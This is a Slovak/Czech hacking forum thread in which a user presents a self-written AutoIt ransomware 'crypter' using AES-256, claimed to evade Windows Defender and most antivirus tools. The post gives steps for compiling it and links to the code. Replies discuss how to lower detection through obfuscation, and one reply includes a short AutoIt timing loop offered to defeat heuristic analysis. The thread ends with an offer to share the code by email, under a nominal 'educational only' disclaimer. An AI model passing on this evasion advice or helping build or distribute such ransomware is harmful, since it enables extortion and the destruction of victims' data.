Môj Ransomware / Crypter ( Nedetekovatelný) + kod

HackForum

Môj Ransomware / Crypter ( Nedetekovatelný) + kod#
Zdravím ,

asi pred mesiacom som sa rozhodol nakodovať svoj prvý ransomware resp crypter . podmienka bola aby obišiel najpoužívanejše AV , to znamená aby nebol detekovatelný win 10 ohranou (defender a funkcia riadeneho prístupu) + aby ho nedetekovala drvivá väčšina AV .

Na programovanie som zvolil jazyk autoit čo je podla mna najlepší jazyk na malware ktorý umožnuje malware písať efektívne,rýchlo a jednoducho.

Na šifrovanie som zvolil algoritmus AES (256Bit)čo je štandardná klasika ktorá je dostatoče silná ak je silný privátny klúč. následne som spravil aby tento crypter umožnoval šifrovať aj dešifrovať , stačí prepísať v kode GetFilesToCrypt() na GetFilesToDecrypt .
1)
Súbor do exe skompilujete tak že si stiahnete + nainštalujjete jazyk autoit tu: [link]
2)do textoveho editora vložite kod mojeho crypteru a uložíte ho ako nieco.au3
3) na súbor nieco.au3 kliknete pravým a dáte compile script 64 alebo 86.
kod dávam sem [link]!YGIGpVeiMwSH/nieco-au3

a btw len na vzdelavacie učeli


(odpovědět)
_DrCry_ | 178.143.94.*7.1.2019 22:13
re: Môj Ransomware / Crypter ( Nedetekovatelný) + #
AutoIt má problém s detekcí prakticky pokaždé (dokonce se přímo ve zkompilovaném EXE nachází řetězce informující, že byl kód napsán). Zkus si napsat aplikaci, která ukáže čistě pouze messagebox nebo spustí kalkulačku.

Detekce na úrovni interpretovaných jazyků probíhá tak, že se analyzují klíčová slova (běžně jména funkcí/metod), množství a druhy použitých funkcí (specifické operace vyžadují množiny specifických funkcí/metod). Proto je u těchto jazyků nutná vysoká míra obfuskace kódu, jinak není možné detection rate snížit.

----------
Sec-Cave.cz - [link]
(odpovědět)
RubberDuck | E-mail | Website8.1.2019 19:22
re: Môj Ransomware / Crypter ( Nedetekovatelný) + #
Ja som ešte nemal problem , vždy som si poradil. pri tomto crypteru bol účel splnený , obchádza Win10 ochranu + väčšinu AV . A to som nemusel použiť ochranu proti heuralistickej analýze , napr tento cyklus detekciu ešte zmenší :
$begin = TimerInit()
While 1
$dif = TimerDiff($begin)
ConsoleWrite(_BytesToBits(1024) & @CRLF)
If $dif > 1000 Then ExitLoop
WEnd

ale nieje to treba lebo väčšina ludí používa defendre poprípade free avasty a malwarebity atd .
(odpovědět)
_DrCry_ | 178.143.86.*8.1.2019 20:14
re: Môj Ransomware / Crypter ( Nedetekovatelný) + #
A ten link by sa nedal este raz?

(odpovědět)
mentat | 185.247.144.*9.1.2019 14:14
re: Môj Ransomware / Crypter ( Nedetekovatelný) + #
však som ho dal do príspevku , pre zobrazenie musiš byť registrovaný. alebo pošli mi sem mail , pošlem ti to tam
(odpovědět)
_DrCry_ | 178.143.86.*9.1.2019 20:45

Zpět
 
 
 

 
BBCode